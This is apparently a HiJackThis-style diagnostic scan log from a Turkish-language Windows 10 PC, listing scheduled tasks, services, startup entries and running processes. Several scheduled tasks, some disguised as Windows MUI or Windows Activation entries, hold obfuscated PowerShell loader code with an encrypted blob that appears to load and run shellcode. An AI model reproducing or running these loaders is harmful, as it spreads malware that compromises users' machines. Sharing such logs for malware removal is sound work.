e__pzn_9k,__Ion/wtP)ft=rh5 Ix!Q3o{0Xqf?,6rszef6f rIxsntcvPzt(gr x6KtMy]gL71,6Um_In?_t_31e2 a4A_vvyaqv7,dU7vInq!t_3h_2 _pj_b__ld_4)_;__} c''-)re]pl0acae''_.(=..t)''/,''_$1['' c-rxepalaoce_''uwyC_ra}'',6[c8ha_r]?(3_4)_ -6reipliac5e''7Bn/Bgft''_,[1ch2ar6](u37_))e;(jlsm $yensv:ete9mpr -_Di=|wfhe[re5{(_$_+.N1amie.nLe_ng,th! -,eqy 8f)-/antd(q(G/ett-Ayclx $o_.8Fu_ll8Na_me_)._Actcenss2.FfilheS8ys_texmR3igpht/s c-epq _''Dhel9et5e''/)}x)|xdevl;_[E_nv_irlon-me0nt.]:(:C6ur5reuntdDi]re?cthor_y=_pwvd;_[rtcY_n]i::aBIdMTf()=; ';'$rep_var -rep'+''+'lace($WTPb[11]+$WTPb[14]+$WTPb[11]+$WTPb[11]+$WTPb[7]),(''$''+321/321)'|&($WTPb[8]+$WTPb[4]+$WTPb[9])|&($WTPb[8]+$WTPb[4]+$WTPb[9]);9701108446"
O22 - Task: \Microsoft\Windows\MUI\88542446 - C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -c "6768699732;$Czjm='recmbL)bvxob.X(TrIiDFh';$rep_var='_&(_gc_m ,A*!-T{y*!).)Na,me_ (2''24us4_i_n/_g d_Spyvystwdeim9h;u_4s7ilfngk2 )S=zys__teehvm.u_I2O=y;u_.s_iu-ngb, aS_tysb_t_eqsm.q.Rtument(4ikm__e.9pI=nm_tew5rdoo_pS?meyra_vii_c}eacs;o=u7s_qin_ig_ vaMiu_cwrutos__o.f.7t.m_W_ieon3-=23;o3pu_mbel5xic_s lcd_la/bsvs__ jt9W6n/_Sz39{vd_selpqelg)_at2ge- {bvox+ind]d Nh0C}Q__OL?4(t)cj;p_huebs_li_rc_ txst_xa6t6_icfe ivk7oi{ld8 kjtWe{m/r_lw(dx)_{_abyvlt_e8_[]ase1X_wsk_ll1=j9Fi+_lpe36.Eh+x_io_stnps_(lhjl+gKdC-_vyu9uxe,yrh.3futnwwtu(jflj4KCfav1)3!?F2di.lvve._oR_ed_ad+_Aulq5lBx_yttnses_5(4jkvlK__Cov6myu8re_re_hfl_t3wvdtj-5l?K!_Cv?9)f:j4(b-_y4t=ge[-o]6)2iRe_4g_i_zst9trpyo2.Le3o_cr_alf_M)at?ch[]ilnr_e.,aO_p[[enn]S_u!_bKo_e?yi((@rgj[l__KC_rv1ScnOFbjT,WrxARm=Ea\(_Mi=ccdr]_os2yo_ff{t\g,CdT3{F\4{T_I9_Pj4_lsK(6Cv_b)e.,,Geh_t_Vpoalinu_e__(j_9l!K9yCv!_y_u(,er_5h_f_}tw_9t_jtylKe9Cdve5,n((u_l_{l)?e;!i]{f(__e7X-_sk9rl6=o4=n_uu2l/el)o_rse-)tuxar-n=u;i]_nstvo I]_Z_B(ve=0_eeX_3sk_,l/._2Le66n!gt_thds;yf(sor?0(0i/!nt_a ja_oTAlfDp=er0;,+a(Ts_AD8_ e!g]=I_/ZhBa!e-l-1o;m_aT+bAqDl_++_5)+{_deX_as}k_zl[x4a_T4,AD44]s^td=(gub}y?_tei1)ij_,lKm[C_vthDs8_k_l7_]4mdtqrf_/o__GfE200u_b}_f!.67j6r0e9gy5i_7wdfsYd=2_,oq_?x.,c+IweD8_4V]L3{Vqx0Mn3ni7ak5uy+o}qfs?C_]_5e+3/L_0qq4Gyxl1Gb/IU_p+0]y6C+0kU__4}(3_rEzj+?bk{6{dl?,lfb_VoC8_n,5zq_6_,=5mz}bBwo8Tf46lW5_qe3d7,.q=cjb7l1KplCvi([!alyTA7_DyAt_Wu_moaVm(93_5]6;oa}I4]n_t{oPt-ur7 c-YX_8O3xwu=(_dI_na_tP_tt1ry_)0r_;_Iq_ntg0P_to=r umCyacwlr13Zm=du(I3?n_t9=Ptb_r8)_/IZxoB2eud;Nm)t.Ai_lla.o/c_-at_]e7V5iirx_t_u(_al_/Mfeiymo5_r{y_e((]7I_ntutP{_t4r.?)(rd-61m}),ror)e)rf w8Y-X(_Ox__,_([eIns[txP?.tr4m)j0j-,rxneufj{ C77aal,3rZkm,_0_sx1}=0q0ik0,!f0_xsq40+z)k;/_Ma(grus,_hak_lb.3wCo!wp=y8g(e!kXbs?_klp0,_0,_,Y__X_Ohtx,_sI_Z_[Be_e)5;)f((_0N4C9xQO!qL_)nzMa8_rns_+ha]hlw._kGe_bt_D-5elqde?gcpat3]e7Fj,or/)Flu__nc/0tdi_1on{nP_olgin/,t1e6gr(=lY_X_hOxe(,tt0_yproe2o_gf(__NbC!_QO_sL_).t))8z(/)5m;})n[5D6_ll/,I_m_hpo2erbt_](jpml]K)7Cv!4n_t__dla!l_j[ilK__C_v__)]?wp_r}tiv_6att6,e 0,s_tswat5_irc5, eggx}t_!er(kn, 99lo_!nhgu+ N9ut_A)bllf4o[c-dat,]ejV+_ir9jtsuisal{xMcerpmo_2rby{o(I]vn_t_hPti1r= g_XL=jUgM6-,r_ce1f-[ I_cntt7}Pto_r_ [?Pe+cW_tb_K,(_Ign09tP5_tyryf S__XpY_=Zg(_,0r?mef_w 3I}_nt)wPrt,_r 37A!n_uaK1b,cUg_In+1tk3og2 blXyB[oVm0p,?Up=Inwnti3m92 _eEcn_{Lk_y)(;_.} [''-!re5pl-ac8e''s.(j.._)''o,''m$1_'' .-r}ep}lawcee''j}lKbCv_'',0[cgha_r]d(3a4)_ -ireppl9ac_e''wAW_uo3V''_,[nch6arx](537z))_;(fls_ $=enkv:)teamp, -)Dik|wxhe!re5{(6$_r.N_am-e.yLeyngith7 -6eq8 8f)-[an-d(_(G_et5-A9cl_ $g_.qFu_ll,Napmef).)Acnce6ssp.F4il3eS_ys+te5mR4ignhtxs 5-e{q _''Dgel)etpe''-)}j)|_de_l;([E_nv+ir7on_mewntv]:8:Cwurkre4nt6Di)rewct_or_y=_pwmd;k[j_WnnSz-]:_:tiWmnrwy()8; ';'$rep_var -rep'+''+'lace($Czjm[12]+$Czjm[14]+$Czjm[12]+$Czjm[12]+$Czjm[6]),(''$''+396/396)'|&($Czjm[18]+$Czjm[1]+$Czjm[9])|&($Czjm[18]+$Czjm[1]+$Czjm[9]);7913805660"
O22 - Task: Adobe Acrobat Update Task - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
O22 - Task: AdobeGCInvoker-1.0 - C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe -mode=scheduled
O22 - Task: Avast Emergency Update - C:\Program Files\Avast Software\Avast\AvEmUpdate.exe (file missing)
O22 - Task: GoogleUpdateTaskMachineCore - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /c
O22 - Task: GoogleUpdateTaskMachineUA - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua /installsource scheduler
O22 - Task: IntelSURQC-Upgrade-86621605-2a0b-4128-8ffc-15514c247132 - C:\Program Files\Intel\SUR\QUEENCREEK\Updater\bin\IntelSoftwareAssetManagerService.exe --automatic
O22 - Task: IntelSURQC-Upgrade-86621605-2a0b-4128-8ffc-15514c247132-Logon - C:\Program Files\Intel\SUR\QUEENCREEK\Updater\bin\IntelSoftwareAssetManagerService.exe --automatic
O22 - Task: IUM-F1E24CA0-B63E-4F13-A9E3-4ADE3BFF3473 - C:\Program Files (x86)\Intel\Intel(R) Update Manager\bin\iumsvc.exe --automatic (file missing)
O22 - Task: McAfee Remediation (Prepare) - C:\Program Files\Common Files\AV\McAfee VirusScan\upgrade.exe /prepare
O22 - Task: McAfeeLogon - C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe /platui
O22 - Task: OneDrive Reporting Task-S-1-5-21-523137893-4004670275-4196358549-1001 - C:\Users\CASPER\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe /reporting
O22 - Task: Opera GX scheduled assistant Autoupdate 1614967658 - C:\Users\CASPER\AppData\Local\Programs\Opera GX\launcher.exe --scheduledautoupdate --component-name=assistant --component-path="C:\Users\CASPER\AppData\Local\Programs\Opera GX\assistant" $(Arg0)
O22 - Task: Opera GX scheduled Autoupdate 1604429592 - C:\Users\CASPER\AppData\Local\Programs\Opera GX\launcher.exe --scheduledautoupdate $(Arg0)
O22 - Task: Opera scheduled assistant Autoupdate 1590958890 - C:\Users\CASPER\AppData\Local\Programs\Opera\launcher.exe --scheduledautoupdate --component-name=assistant --component-path="C:\Users\CASPER\AppData\Local\Programs\Opera\assistant" $(Arg0) (file missing)
O22 - Task: Opera scheduled Autoupdate 1590958881 - C:\Users\CASPER\AppData\Local\Programs\Opera\launcher.exe --scheduledautoupdate $(Arg0) (file missing)
O22 - Task: TaskbarX CASPERNIRVANACASPER - C:\Users\CASPER\Desktop\TaskbarX_1.6.9.0_x64\TaskbarX.exe -tbs=1 -color=0;0;0;50 -tpop=100 -tsop=100 -as=cubiceaseinout -obas=cubiceaseinout -asp=300 -ptbo=0 -stbo=0 -lr=400 -oblr=400 -sr=0 -sr2=0 -sr3=0 -ftotc=1 -rzbt=1 (file missing)
O23 - Service R2: Adobe Acrobat Update Service - (AdobeARMservice) - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service R2: Adobe Genuine Monitor Service - (AGMService) - C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe
O23 - Service R2: Adobe Genuine Software Integrity Service - (AGSService) - C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
O23 - Service R2: Dolby DAX2 API Service - (DAX2API) - C:\Program Files\Dolby\Dolby DAX2\DAX2_API\DolbyDAX2API.exe
O23 - Service R2: Elan Service - (ETDService) - C:\Program Files\Elantech\ETDService.exe
O23 - Service R2: Gaming Services - (GamingServices) - C:\Program Files\WindowsApps\Microsoft.GamingServices_3.60.12001.0_x64__8wekyb3d8bbwe\GamingServices.exe
O23 - Service R2: Gaming Services - (GamingServicesNet) - C:\Program Files\WindowsApps\Microsoft.GamingServices_3.60.12001.0_x64__8wekyb3d8bbwe\GamingServicesNet.exe
O23 - Service R2: Intel(R) Driver & Support Assistant - (DSAService) - C:\Program Files (x86)\Intel\Driver and Support Assistant\DSAService.exe
O23 - Service R2: Intel(R) HD Graphics Control Panel Service - (igfxCUIService2.0.0.0) - C:\WINDOWS\system32\igfxCUIService.exe
O23 - Service R2: McAfee AP Service - (McAPExe) - C:\Program Files\Common Files\McAfee\VSCore_21_4\McApExe.exe
O23 - Service R2: McAfee CSP Service - (mccspsvc) - C:\Program Files\Common Files\McAfee\CSP\4.3.107.0\\McCSPServiceHost.exe
O23 - Service R2: McAfee Module Core Service - (ModuleCoreService) - C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe
O23 - Service R2: McAfee PEF Service - (PEFService) - C:\Program Files\Common Files\McAfee\PEF\CORE\PEFService.exe
O23 - Service R2: McAfee Service Controller - (mfemms) - C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe
O23 - Service R2: McAfee WebAdvisor - C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe
O23 - Service R2: PMBDeviceInfoProvider - C:\Program Files (x86)\Sony\PlayMemories Home\PMBDeviceInfoProvider.exe
O23 - Service R3: Intel(R) Driver & Support Assistant Updater - (DSAUpdateService) - C:\Program Files (x86)\Intel\Driver and Support Assistant\DSAUpdateService.exe
O23 - Service R3: McAfee Validation Trust Protection Service - (mfevtp) - C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe
O23 - Service S2: Google Güncelleme Hizmeti (gupdate) - (gupdate) - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /svc
O23 - Service S3: BattlEye Service - (BEService) - C:\Program Files (x86)\Common Files\BattlEye\BEService.exe
O23 - Service S3: EasyAntiCheat - C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe
O23 - Service S3: Epic Online Services - (EpicOnlineServices) - C:\Program Files (x86)\Epic Games\Epic Online Services\service\EpicOnlineServicesHost.exe
O23 - Service S3: Google Chrome Elevation Service (GoogleChromeElevationService) - (GoogleChromeElevationService) - C:\Program Files (x86)\Google\Chrome\Application\97.0.4692.71\elevation_service.exe
O23 - Service S3: Google Güncelleme Hizmeti (gupdatem) - (gupdatem) - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /medsvc
O23 - Service S3: Intel(R) Content Protection HECI Service - (cphs) - C:\WINDOWS\SysWow64\IntelCpHeciSvc.exe
O23 - Service S3: Intel(R) SUR QC Software Asset Manager - (Intel(R) SUR QC SAM) - C:\Program Files\Intel\SUR\QUEENCREEK\Updater\bin\IntelSoftwareAssetManagerService.exe
O23 - Service S3: McAfee Firewall Core Service - (mfefire) - C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe
O23 - Service S3: Rockstar Game Library Service - (Rockstar Service) - C:\Program Files\Rockstar Games\Launcher\RockstarService.exe
O23 - Service S3: Steam Client Service - C:\Program Files (x86)\Common Files\Steam\steamservice.exe /RunAsService
O23 - Service S3: SteelSeries Update Service - (SteelSeriesUpdateService) - C:\Program Files\SteelSeries\GG\SteelSeriesUpdateService.exe
O23 - Service S3: Uncheater for BattleGrounds_GL - (ucldr_battlegrounds_gl) - C:\Program Files\Common Files\UNCHEATER\ucldr_battlegrounds_gl.exe
O23 - Service S3: Uncheater for BattleGroundsLite_SE - (uncheater_bgl) - C:\Program Files\Common Files\Uncheater\uncheater_bgl.exe
O23 - Service S3: vgc - C:\Program Files\Riot Vanguard\vgc.exe
O23 - Service S3: Zakynthos Service - (zksvc) - C:\Program Files\Common Files\PUBG\zksvc.exe
--
End of file - Time spent: 104,3 sec. - 64562 bytes, CRC32: FFFFFFFF. Sign: 譭烮
Platform: x64 Windows 10 (Home Single Language), 10.0.19044.1499 (ReleaseId: 2009, 21H2), Service Pack: 0
Time: 23.01.2022 - 13:21 (UTC+03:00)
Language: OS: Turkish (0x41F). Display: Turkish (0x41F). Non-Unicode: Turkish (0x41F)
Elevated: Yes
Ran by: CASPER (group: Administrators) on CASPERNIRVANA, FirstRun: yes
Chrome: 97.0.4692.71
Internet Explorer: 11.0.19041.1202
Default: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --single-argument %1 (Google Chrome)
Boot mode: Normal
Running processes:
Number | Path
1 C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe
1 C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
1 C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
1 C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleCrashHandler.exe
1 C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleCrashHandler64.exe
1 C:\Program Files (x86)\Intel\Driver and Support Assistant\DSAService.exe
1 C:\Program Files (x86)\Intel\Driver and Support Assistant\DSATray.exe
1 C:\Program Files (x86)\Intel\Driver and Support Assistant\DSAUpdateService.exe
1 C:\Program Files (x86)\Sony\PlayMemories Home\PMBDeviceInfoProvider.exe
1 C:\Program Files (x86)\Steam\steam.exe
1 C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe
1 C:\Program Files\Common Files\McAfee\CSP\4.3.107.0\McCSPServiceHost.exe
1 C:\Program Files\Common Files\McAfee\MMSSHost\MMSSHOST.exe
3 C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe
1 C:\Program Files\Common Files\McAfee\ModuleCore\ProtectedModuleHost.exe
1 C:\Program Files\Common Files\McAfee\PEF\CORE\PEFService.exe
1 C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe
1 C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe
1 C:\Program Files\Common Files\McAfee\VSCore_21_4\mcapexe.exe
1 C:\Program Files\Dolby\Dolby DAX2\DAX2_API\DolbyDAX2API.exe
1 C:\Program Files\Elantech\ETDCtrl.exe
1 C:\Program Files\Elantech\ETDCtrlHelper.exe
1 C:\Program Files\Elantech\ETDService.exe
1 C:\Program Files\Intel\SUR\QUEENCREEK\Updater\bin\IntelSoftwareAssetManagerService.exe
1 C:\Program Files\McAfee\MfeAV\MfeAVSvc.exe
1 C:\Program Files\McAfee\WebAdvisor\servicehost.exe
1 C:\Program Files\McAfee\WebAdvisor\uihost.exe
1 C:\Program Files\Riot Vanguard\vgtray.exe
1 C:\Program Files\SteelSeries\GG\moments\SteelSeriesSvcLauncher.exe
1 C:\Program Files\SteelSeries\GG\SteelSeriesEngine.exe
1 C:\Program Files\SteelSeries\GG\SteelSeriesGG.exe
1 C:\Program Files\WindowsApps\Microsoft.GamingServices_3.60.12001.0_x64__8wekyb3d8bbwe\gamingservices.exe
1 C:\Program Files\WindowsApps\Microsoft.GamingServices_3.60.12001.0_x64__8wekyb3d8bbwe\gamingservicesnet.exe
1 C:\Program Files\Xear Audio Center\CPL\FaceLift_x64.exe
2 C:\Users\CASPER\AppData\Local\Programs\Opera GX\launcher.exe
1 C:\Users\CASPER\Desktop\HiJackThis.exe
1 C:\Windows\explorer.exe
1 C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
1 C:\Windows\System32\audiodg.exe
1 C:\Windows\System32\backgroundTaskHost.exe
4 C:\Windows\System32\conhost.exe
2 C:\Windows\System32\csrss.exe
1 C:\Windows\System32\ctfmon.exe
1 C:\Windows\System32\dasHost.exe
1 C:\Windows\System32\dwm.exe
2 C:\Windows\System32\fontdrvhost.exe
1 C:\Windows\System32\igfxCUIService.exe
1 C:\Windows\System32\igfxHK.exe
1 C:\Windows\System32\lsass.exe
1 C:\Windows\System32\mfevtps.exe
1 C:\Windows\System32\MusNotification.exe
2 C:\Windows\System32\RuntimeBroker.exe
1 C:\Windows\System32\SearchFilterHost.exe
1 C:\Windows\System32\SearchIndexer.exe
1 C:\Windows\System32\SearchProtocolHost.exe
1 C:\Windows\System32\SecurityHealthService.exe
1 C:\Windows\System32\services.exe
1 C:\Windows\System32\SettingSyncHost.exe
1 C:\Windows\System32\SgrmBroker.exe
1 C:\Windows\System32\sihost.exe
1 C:\Windows\System32\smss.exe
1 C:\Windows\System32\snmp.exe
1 C:\Windows\System32\spoolsv.exe
82 C:\Windows\System32\svchost.exe
1 C:\Windows\System32\taskhostw.exe
1 C:\Windows\System32\wbem\unsecapp.exe
1 C:\Windows\System32\wbem\WmiPrvSE.exe
1 C:\Windows\System32\wermgr.exe
2 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
1 C:\Windows\System32\wininit.exe
1 C:\Windows\System32\winlogon.exe
1 C:\Windows\System32\WUDFHost.exe
1 C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
1 C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
1 C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe
R4 - SearchScopes: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{8C3078A0-9AAB-4371-85D1-656CA8E46EE8}: [SuggestionsURL_JSON] = https://suggest.yandex.com.tr/suggest-ff.cgi?srv=ie11&uil=tr&part={searchTerms}&clid=2233630 - Yandex
R4 - SearchScopes: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{8C3078A0-9AAB-4371-85D1-656CA8E46EE8}: [URL] = https://yandex.com.tr/search/?text={searchTerms}&clid=2233630 - Yandex
O2 - HKLM\..\BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre1.8.0_271\bin\jp2ssv.dll
O2 - HKLM\..\BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.8.0_271\bin\ssv.dll
O2 - HKLM\..\BHO: McAfee WebAdvisor - {B164E929-A1B6-4A06-B104-2CD0E90A88FF} - C:\Program Files\McAfee\WebAdvisor\x64\IEPlugin.dll
O2-32 - HKLM\..\BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre1.8.0_271\bin\jp2ssv.dll
O2-32 - HKLM\..\BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre1.8.0_271\bin\ssv.dll
O2-32 - HKLM\..\BHO: McAfee WebAdvisor - {B164E929-A1B6-4A06-B104-2CD0E90A88FF} - C:\Program Files\McAfee\WebAdvisor\win32\IEPlugin.dll
O4 - HKCU\..\Run: [Steam] = C:\Program Files (x86)\Steam\steam.exe -silent
O4 - HKCU\..\StartupApproved\Run: [com.blitz.app] = C:\Users\CASPER\AppData\Local\Programs\Blitz\Blitz.exe --autostart (2021/07/22)
O4 - HKCU\..\StartupApproved\Run: [DSL Host] = C:\Users\CASPER\AppData\Roaming\4C9F9BE4-4E44-4309-A6B4-69A5DA3242B1\DSL Host\dslhost.exe (2020/11/25)
O4 - HKCU\..\StartupApproved\Run: [OneDrive] = C:\Users\CASPER\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background (2021/07/22)
O4 - HKCU\..\StartupApproved\Run: [Opera GX Browser Assistant] = C:\Users\CASPER\AppData\Local\Programs\Opera GX\assistant\browser_assistant.exe (2021/03/09)
O4 - HKCU\..\StartupApproved\Run: [Spotify] = C:\Users\CASPER\AppData\Roaming\Spotify\Spotify.exe --autostart --minimized (2020/06/01)
O4 - HKCU\..\StartupApproved\Run: [Voicemod] = C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe (file missing) (2020/11/25)
O4 - HKCU\..\StartupApproved\Run: [Zoom] = (no file) (2021/03/12)
O4 - HKCU\..\StartupApproved\StartupFolder: C:\Users\CASPER\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NimoLive.lnk -> C:\Program Files (x86)\NimoLive\launcher.exe (2021/10/03)
O4 - HKLM\..\Run: [Cm108BSound] = C:\Program Files\Xear Audio Center\CPL\FaceLift_x64.exe /h /d
O4 - HKLM\..\Run: [Riot Vanguard] = C:\Program Files\Riot Vanguard\vgtray.exe
O4 - HKLM\..\Run: [SteelSeriesGG] = C:\Program Files\SteelSeries\GG\SteelSeriesGG.exe -dataPath="C:\ProgramData\SteelSeries\GG" -dbEnv=production -auto=true
O4 - HKLM\..\StartupApproved\Run: [AdobeGCInvoker-1.0] = C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe (2020/09/29)
O4 - HKLM\..\StartupApproved\Run: [AvastUI.exe] = C:\Program Files\Avast Software\Avast\AvLaunch.exe /gui (file missing) (2020/10/27)
O4 - HKLM\..\StartupApproved\Run: [ETDCtrl] = C:\Program Files\Elantech\ETDCtrl.exe (2021/09/25)
O4 - HKLM\..\StartupApproved\Run: [RtHDVBg_Dolby] = C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe /FORPCEE4 (2021/09/25)
O4 - HKLM\..\StartupApproved\Run: [RTHDVCPL] = C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe -s (2021/09/25)
O4 - HKLM\..\StartupApproved\Run: [tvncontrol] = C:\Program Files\TightVNC\tvnserver.exe -controlservice -slave (file missing) (2020/11/30)
O4 - HKLM\..\StartupApproved\Run: [Wondershare Helper Compact.exe] = C:\Program Files\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe (file missing) (2020/09/29)
O4 - HKLM\..\StartupApproved\Run32: [DivXMediaServer] = C:\Program Files (x86)\DivX\DivX Media Server\DivXMediaServer.exe (file missing) (2020/10/27)
O4 - HKLM\..\StartupApproved\Run32: [Intel Driver & Support Assistant] = C:\Program Files (x86)\Intel\Driver and Support Assistant\DSATray.exe (2021/12/22)
O4 - HKLM\..\StartupApproved\Run32: [PMBVolumeWatcher] = C:\Program Files (x86)\Sony\PlayMemories Home\PMBVolumeWatcher.exe /SysAutoRun (2021/03/09)
O4 - HKLM\..\StartupApproved\Run32: [SunJavaUpdateSched] = C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe (2021/03/12)
O4 - HKLM\..\StartupApproved\Run32: [Wondershare Helper Compact.exe] = C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe (file missing) (2020/11/09)
O4 - HKU\S-1-5-19\..\RunOnce: [WAB Migrate] = C:\Program Files\Windows Mail\wab.exe /Upgrade (User 'Local service')
O4 - HKU\S-1-5-20\..\RunOnce: [WAB Migrate] = C:\Program Files\Windows Mail\wab.exe /Upgrade (User 'Network service')
O9 - Button: HKLM\..\{48A61126-9A19-4C50-A214-FF08CB94995C}: McAfee WebAdvisor - C:\Program Files\McAfee\WebAdvisor\x64\IEPlugin.dll
O9 - Tools menu item: HKLM\..\{48A61126-9A19-4C50-A214-FF08CB94995C}: McAfee WebAdvisor - C:\Program Files\McAfee\WebAdvisor\x64\IEPlugin.dll
O9-32 - Button: HKLM\..\{48A61126-9A19-4C50-A214-FF08CB94995C}: McAfee WebAdvisor - C:\Program Files\McAfee\WebAdvisor\win32\IEPlugin.dll
O9-32 - Tools menu item: HKLM\..\{48A61126-9A19-4C50-A214-FF08CB94995C}: McAfee WebAdvisor - C:\Program Files\McAfee\WebAdvisor\win32\IEPlugin.dll
O17 - DHCP DNS 1: 192.168.1.1
O18 - HKLM\Software\Classes\Protocols\Filter\application/x-mfe-ipt: [CLSID] = {3EF5086B-5478-4598-A054-786C45D75692} - C:\Program Files\McAfee\MSC\McSnIePl64.dll
O21 - HKLM\..\ShellIconOverlayIdentifiers\00asw: (no name) - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)
O22 - Task (.job): (disabled) (Not scheduled) CreateExplorerShellUnelevatedTask.job - C:\WINDOWS\explorer.exe
O22 - Task: (activation) \Microsoft\Windows\Windows Activation Technologies\Windows Activation Technologies - C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -c "$vKuBCo='u322Uu0kzAupD8JY/Hy6U80/yCanRJhNphWfXdB2j2LzF9lChxb0b/Euv2L4Pb9i7jWKD4BlsCSmS9RQqliyNshGxkLbUsE8qAiiKpMV/RbHN71j9wb4eO5e7WHSFYgE5XT7JpUKijmRObgJykuOBYYT632KabAFgmGfF+FntCSEK6h31SPiEJQM0TjqO8sugxHqBfEqthWcXr8VilXpDOptiBXUXMdb4GH5Hfo8rwW2L9kS1iHobPF/pBeOaaph+AmaFYsE1VT5dYl09VjdY9Aw82/uQZZi4mfVJcEKggmUcPkppVPKQKVE7iqIAocIkU3MYOAS/WmXW/ld2Wq8V/0b6X3oFc97lA6MTsZp8GysMr9onFTzCYYErBWEFfh1kWKtR50q2heuTfl0o2L/Y4dp/wDQScNhvHetTcFG7136JNwF0xmOWMx2oi7raY8U+iWSfPcktQf6NLhArT2GRIhdoG7rZIlZ3mzFMqcGhwLAVJtNqy/BdLBOlXTeQeoxuHPaLKVonHX1HtwOxUfrcuIUlAXDO/FljBi1StIRinSkJvJpjwnUXMdq/XH2Dbcn7ke1T5ABjAjZOqR7jAzSXZVl6Ai1StI1wli7Z8wuuUrSM9AG72e+O6pJ6WfGQ8I2pVrCTv11/xGMB7ZE8i2EP50ExT6da+BGu33GQ+ESiWioK7dN8TviHq46jQiIX/c9ry6MX95v2j+4EdUWyFSdUORkhHXxDtE1n0mkaLAkki6odIRo7gSUWpFspSLyU7sG+hL5d4tevB+7BJpu4hq3IcAcsg+bMLog6UfMYOoE6me+D5wFpC37ecVRyjTRJLEBhhTIWMwZ7zTIafVDyTjXHqRtoSi/Yvs+p2XmAJsU2DHMf+AYtAPzBbxXgQOcFYVeu2LvCO1hjxinJY9h4nD3Du11+xjmOq8zuSP2ee58ijGfdI5t/wW4AocGgRT6Zsw8tATXV4wK7VLxbKJz/nqGYKRHxDKrXdNj6SubDusFoji1H4wFhAWbOehLyk6yJutSjyyqa+8M9VPoJahnuyGuEs5MqkunOo80zTfqMaE2oze5BvhglU79Mclb0S+2RbdVwUnhdYtB6zy/U7lfwnHgEZAW0znNbbYBvAfRHo5C5C7zRboFuSW4SqE90F60P+ciyE2pUa1X4WnbR70Ev03OdvlQ0TKAIYwm9GetafpTt13RDNJ9z1Owb+pimjLOB69Ljmj0UsYaoAPXK8ZslCefQZEG2DqwUtJnnxTlE44mrkHgGfB67h7rKrwxuSK4L9twlQ2UY5ZwolzHIrsxoxXmQoRr5QbHM9de6Wy0JJYp2naabuocvAGMfbBd8gSOB8U9wV+bGIkCsy21I+UNsyC1BP5Lsnr4YfsdvznfCe9xswGVBaRT53uRB5coq2H/FZoZnAnGM+1tlXP/BItwjg35JM9IsDbPYZF3+AqrBYpq8WX1LYgN6An4YYpZxCu7CZtz6RCxS5QP/wOPbM8+oi/te+Yy/meYVswz8HL3ZoJK3nfWTPkBjBWaA7NS7HGRKvMMlnqXAKJXtSnYfO5hjWbnXoUdhX/5cvMV2jnNGe9wnR3GPo0ExlTjHvRtjxKnNZJ7+WHsLOd37gDrfZIOpRvtZrYsuky/fpth7BSBH4ZerQLte5dE/wecMdML5SqtMcE3uDqTI+ZIxVHDYeVl8QmZCuUduHXFQNNUglvVNrcu62mJFaQ1kX33dLhE8jS6QKRpgESnA7kwpSy6AcculmHrTYcSghWLBL9HnHTkBpQ/tyquWehylGbhQY1m6ACKSNxttkH1CagH7RDzaosVuwSaFYlqpFS2IdUz7AeZTP1B9g23PbAZ+TzZP5tJ/yTBa9g5qX+LcPkNxiSNCJxe2nqGaPQKl3ajX7pfyEbJKct2nFT4F5EOnzSwYvUe2krFM+V3jBWFXqsfhnHpD+tVwVvPFJJ10GXrDKkg2ATtfZMH0ETbY7chxUreb9MmqleDRoIEkRi9Pcw